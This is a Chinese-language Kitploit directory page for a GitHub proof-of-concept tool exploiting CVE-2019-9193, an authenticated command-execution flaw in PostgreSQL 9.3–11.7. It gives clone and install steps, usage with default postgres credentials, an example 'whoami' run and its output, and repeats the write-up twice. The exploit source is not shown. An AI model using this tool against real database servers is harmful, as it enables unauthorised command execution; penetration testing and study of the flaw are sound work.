Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/geniuszly/cve-2019-9193
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育数据库安全
GitHubgeniuszly/cve-2019-9193

CVE-2019-9193

是一个 PoC 工具,旨在利用特定版本 PostgreSQL(9.3 - 11.7)中的一个需认证的远程代码执行(RCE)漏洞。

查看仓库
411年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

EN

GenPostgresRCEExploit 是一个 PoC 工具,旨在利用特定版本 PostgreSQL(9.3 - 11.7)中经过身份验证的远程代码执行(RCE)漏洞。它允许已认证用户在存在 CVE-2019-9193 漏洞的 PostgreSQL 数据库服务器上执行系统命令。

功能特性

  • RCE 漏洞利用:通过已认证的 PostgreSQL 会话执行系统命令。
  • 版本检查:验证目标 PostgreSQL 服务器的版本,以确认是否存在该漏洞。
  • 命令执行:如果服务器存在漏洞,则允许在服务器上执行自定义命令。
  • 自动表管理:自动创建和删除用于命令执行的临时表,无需手动干预。

环境要求

  • Python 3.x
  • PostgreSQL 客户端库(psycopg2 包)

安装

  1. 克隆仓库:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    
  2. 安装所需包:
    root@kitploit:~
    pip install -r requirements.txt
    

使用方法

root@kitploit:~
python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c "<system_command>"

选项

  • -i, --ip:PostgreSQL 服务器的 IP 地址(默认:127.0.0.1)
  • -p, --port:PostgreSQL 服务器的端口(默认:5432)
  • -d, --database:PostgreSQL 数据库的名称(默认:template1)
  • -U, --user:用于连接 PostgreSQL 服务器的用户名(默认:postgres)
  • -P, --password:用于连接 PostgreSQL 服务器的密码(默认:postgres)
  • -c, --command:要在服务器上执行的系统命令
  • -t, --timeout:连接超时时间(秒)(默认:10)

示例

root@kitploit:~
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"

此示例连接到位于 192.168.1.10 的 PostgreSQL 服务器,使用提供的凭据进行身份验证,并执行 whoami 命令。

示例输出

root@kitploit:~
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена

postgres

免责声明

此工具仅用于教育目的和道德测试。未经授权对任何系统使用此工具均属非法行为,并严格禁止。作者不对任何滥用行为承担责任。

RU

GenPostgresRCEExploit 是一个 PoC 漏洞利用工具,旨在利用特定版本 PostgreSQL(9.3 - 11.7)中已认证的远程代码执行(RCE)漏洞。该程序允许已认证用户在存在 CVE-2019-9193 漏洞的 PostgreSQL 服务器上执行系统命令。

功能特性

  • RCE 漏洞利用:通过已认证的 PostgreSQL 连接执行系统命令。
  • 版本检查:检查目标 PostgreSQL 服务器的版本,以确认是否存在漏洞。
  • 命令执行:在存在漏洞的情况下,允许在服务器上执行任意命令。
  • 表管理:自动创建和删除用于执行命令的临时表。

环境要求

  • Python 3.x
  • PostgreSQL 客户端库(psycopg2 包)

安装

  1. 克隆仓库:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    
  2. 安装所需包:
    root@kitploit:~
    pip install -r requirements.txt
    

使用方法

root@kitploit:~
python3 GenPostgresRCEExploit.py -i <IP-адрес> -p <порт> -d <имя_базы_данных> -U <пользователь> -P <пароль> -c "<системная_команда>"

选项

  • -i, --ip:PostgreSQL 服务器的 IP 地址(默认:127.0.0.1)
  • -p, --port:PostgreSQL 服务器的端口(默认:5432)
  • -d, --database:PostgreSQL 数据库的名称(默认:template1)
  • -U, --user:用于连接 PostgreSQL 服务器的用户名(默认:postgres)
  • -P, --password:用于连接 PostgreSQL 服务器的密码(默认:postgres)
  • -c, --command:要在服务器上执行的系统命令
  • -t, --timeout:连接超时时间(秒)(默认:10)

示例

root@kitploit:~
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"

在此示例中,程序连接到位于 192.168.1.10 的 PostgreSQL 服务器,使用指定凭据进行身份验证,并执行 whoami 命令。

输出示例

root@kitploit:~
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена

postgres

免责声明

此工具仅用于教育目的和合法测试。未经授权对任何系统使用此工具均属违法行为,并严格禁止。作者对任何滥用行为不承担任何责任。

下载工具